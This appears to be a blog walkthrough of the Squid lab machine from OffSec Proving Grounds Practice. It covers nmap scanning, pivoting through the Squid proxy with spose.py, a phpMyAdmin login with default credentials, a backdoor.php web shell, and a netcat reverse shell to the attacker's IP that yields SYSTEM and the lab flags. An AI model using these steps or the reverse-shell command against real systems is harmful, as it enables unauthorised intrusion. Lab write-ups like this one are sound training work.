Post

Squid

Proving Ground Practice Easy Level Machine ! you gona learn about Squid Connections and RFI.

Posted
Windows Easy Level Machine
Windows Easy Level Machine
By Shivendra Prajapati
3 min read

Port Scan Results ⤵️

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

┌──(kali🔥kali)-[~/Downloads/Proving_Ground/Practice/Squid]
└─$ sudo nmap -sC -sV -p- -vv -T4 -oN Nmap_Results.txt -Pn 192.168.156.189
Nmap scan report for 192.168.156.189
Host is up, received user-set (0.10s latency).
Scanned at 2024-06-21 21:28:43 IST for 250s
Not shown: 65529 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON          VERSION
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 125
3128/tcp  open  http-proxy    syn-ack ttl 125 Squid http proxy 4.14
|_http-server-header: squid/4.14
|_http-title: ERROR: The requested URL could not be retrieved
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-06-21T16:02:15
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 54801/tcp): CLEAN (Timeout)
|   Check 2 (port 30810/tcp): CLEAN (Timeout)
|   Check 3 (port 12856/udp): CLEAN (Timeout)
|   Check 4 (port 29016/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: 0s

Squid Enumeration ⤵️

This Squid http proxy allows us to access the connection on different port using certain Tool like spose.py and Burpsuite.

For further Information I used hacktricks.

1
2
3
4
5

┌──(kali🔥kali)-[~/…/Proving_Ground/Practice/Squid/spose]
└─$ python3 spose.py --proxy http://192.168.156.189:3128 --target 192.168.156.189
Using proxy address http://192.168.156.189:3128
192.168.156.189 3306 seems OPEN 
192.168.156.189 8080 seems OPEN

As I ran spose.py Tool It gave me redirect port but to access that I need to setup the proxy from burpsuite as port 3128.

Image

So I accessed http://192.168.156.189:8080 and got access to a Wampserver page.

Image

Now I also got phpmyadmin on this machine I login in it with default creds and checked for any SQL command execution.

Image

I also got to know the file system at which this site is hosted upon from phpinfo.php page.

Image I used the SQL for RFI and it worked like this 🔻

Image

I got command execution now as nt authority\system.

Image Here is how I got the connection made for a stable shell 🔻

192.168.156.189:8080/backdoor.php?cmd=nc.exe%20-e%20cmd.exe%20192.168.45.157%20445

I catch the response on port 445 and I am nt authority\system now 🔻

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75

┌──(kali🔥kali)-[~/Downloads/Proving_Ground/Practice/Squid]
└─$ rlwrap nc -lvnp 445    
listening on [any] 445 ...
connect to [192.168.45.157] from (UNKNOWN) [192.168.156.189] 49999
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\wamp\www>whoami
whoami
nt authority\system

C:\wamp\www>cd C:\Users\Administrator
cd C:\Users\Administrator

C:\Users\Administrator>tree /f /a
tree /f /a
Folder PATH listing
Volume serial number is 5C30-DCD7
C:.
+---3D Objects
+---Contacts
+---Desktop
|       proof.txt
|       
+---Documents
+---Downloads
+---Favorites
|   |   Bing.url
|   |   
|   \---Links
+---Links
|       Desktop.lnk
|       Downloads.lnk
|       
+---Music
+---Pictures
+---Saved Games
+---Searches
\---Videos

C:\Users\Administrator>type Desktop\proof.txt
type Desktop\proof.txt
ebe9584613557c8c2c915cce5570c6dd

C:\Users\Administrator>cd ../
cd ../

C:\Users>cd ..
cd ..

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 5C30-DCD7

 Directory of C:\

06/21/2024  08:57 AM                34 local.txt
06/21/2024  08:57 AM             2,697 output.txt
05/28/2021  04:20 AM    <DIR>          PerfLogs
05/28/2021  06:06 AM    <DIR>          Program Files
05/28/2021  03:53 AM    <DIR>          Program Files (x86)
11/23/2021  09:48 AM    <DIR>          Squid
05/28/2021  03:53 AM    <DIR>          Users
11/23/2021  01:05 PM    <DIR>          wamp
11/19/2021  12:12 AM    <DIR>          Windows
05/28/2021  06:04 AM    <DIR>          Windows10Upgrade
               2 File(s)          2,731 bytes
               8 Dir(s)   8,782,487,552 bytes free

C:\>type local.txt
type local.txt
ade423e4b0f6672bc92c319e93de8e66

C:\>

I am nt authority\system Now !!

If you have any questions or suggestions, please leave a comment below. Thank You !

Proving Grounds, Practice
Squid spose RFI PrivEsc default_creds
This post is licensed under CC BY 4.0 by the author.